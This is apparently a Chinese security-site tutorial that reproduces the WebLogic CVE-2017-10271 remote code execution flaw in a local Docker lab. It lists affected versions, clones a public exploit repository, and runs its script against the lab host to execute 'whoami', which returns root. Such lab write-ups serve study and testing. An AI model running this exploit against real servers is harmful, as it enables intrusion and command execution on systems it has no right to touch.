CVE-2017-10271 简单利用

华盟原创文章投稿奖励计划

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,发现此漏洞的利用方式为传播挖矿程序。

CVE-2017-10271 简单利用

漏洞影响范围:
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 10.3.3.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.1.0
Oracle WebLogic Server 12.2.1.2.0
漏洞复现:
kali:192.168.123.154
centos7:192.168.123.152
环境搭建:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
unzip CVE-2017-10271.zip
cd CVE-2017-10271
docker-compose up -d
docker run -it -d -p 8080:7001 df5a24935f49

CVE-2017-10271 简单利用

访问漏洞环境 192.168.123.152:8080

CVE-2017-10271 简单利用

漏洞利用
下载CVE-2017-10271
git clone https://github.com/nhwuxiaojun/CVE-2017-10271
cd CVE-2017-10271 进入目录
python weblogic_wls_wsat_exp.py -t http://192.168.123.152:8080 -c whoami    查看当前用户

CVE-2017-10271 简单利用

成功反回当前用户root,漏洞利用成功!
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/263402.html

发表评论